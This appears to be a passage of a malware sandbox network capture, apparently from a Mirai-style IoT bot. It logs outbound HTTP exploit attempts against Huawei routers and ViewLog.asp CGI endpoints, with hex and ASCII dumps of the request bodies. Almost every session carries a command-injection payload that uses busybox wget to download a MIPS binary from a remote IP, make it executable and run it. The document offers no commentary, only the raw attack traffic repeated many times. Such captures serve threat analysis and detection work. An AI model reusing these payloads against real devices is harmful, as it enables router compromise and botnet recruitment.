                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              611192.168.2.1455360156.241.87.24137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.691725969 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:02.881494999 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:09.025249004 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:21.056751013 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              612192.168.2.145809095.164.35.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.835314035 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.049325943 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              613192.168.2.143417694.121.130.1098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.841445923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              614192.168.2.144612495.86.113.1628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.858194113 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              615192.168.2.145413031.19.185.468080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:58.861160040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.072453976 CET1257INHTTP/1.1 307 Temporary Redirect
                                              Date: Thu, 23 Nov 2023 04:17:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 152
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              616192.168.2.144934262.210.207.1248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.009233952 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.183341026 CET345INHTTP/1.1 404 Not Found
                                              Content-Security-Policy: frame-src 'self' https://traefik.io https://*.traefik.io;
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:17:59 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              617192.168.2.145572231.136.171.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:59.018724918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:59.585623980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.709570885 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.137520075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.745289087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
